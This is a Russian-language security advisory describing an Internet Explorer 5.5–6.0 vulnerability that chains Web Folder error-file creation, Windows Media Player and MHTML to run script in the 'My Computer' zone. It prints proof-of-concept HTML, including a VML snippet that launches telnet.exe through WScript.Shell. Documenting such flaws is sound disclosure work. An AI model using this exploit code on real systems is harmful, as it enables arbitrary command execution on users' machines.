Уязвимость обнаружена в Microsoft Internet Explorer (IE). Удаленный пользователь может сконструировать HTML, который, при загрузке в браузере целевого пользователя, выполнит произвольный код сценария на системе целевого пользователя в "My Computer" зоне безопасности. 

Удаленный пользователь может сконструировать следующий HTML, который может обратиться к Web Folder целевого пользователя: 

<body onload=malware() style="behavior: url(#default#httpFolder);">
<script>
function malware(){document.body.navigate
("http://www.microsoft.com");}
</script>

Если Web Folder не существует, во временной папке будет создан файл ошибки
wecerr.txt. Содержание файла может быть определенно удаленным пользователем. 

Удаленный пользователь может заставить Windows Media Player создать HTML IFRAME, содержащий asf media файл, который загрузит временный локальный файл (mhtml:file://C:\WINDOWS\TEMP\wecerr.txt). Так как Windows Media Player запущен локально, локальный файл будет открыт. HTML код будет открыт как “Temporary Internet File”. Однако эту меру защиты можно обойти, если создать второй wecerr.txt файл (перезаписывая первый) в это время с другим (и злонамеренным) содержанием типа: 

<xml xmlns:v = "urn:schemas-microsoft-com:vml">

<v:rect id="malware" fillcolor="red" 
style="position:relative;top:1;left:1;width:20;height:20"
onmouseover="javas cript:alert(document.location);var wsh=new 
ActiveXObject('WScript.Shell');wsh.Run('telnet.exe');''">
</v:rect>

</xml>

Поскольку VML фрейм записан поверх первоначального wecerr.txt файла, VML фрем может быть обработан IE. Поскольку извлеченный MHTML файл был первоначально извлечен локально, код будет выполнен в "My Computer" зоне безопасности. 

Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии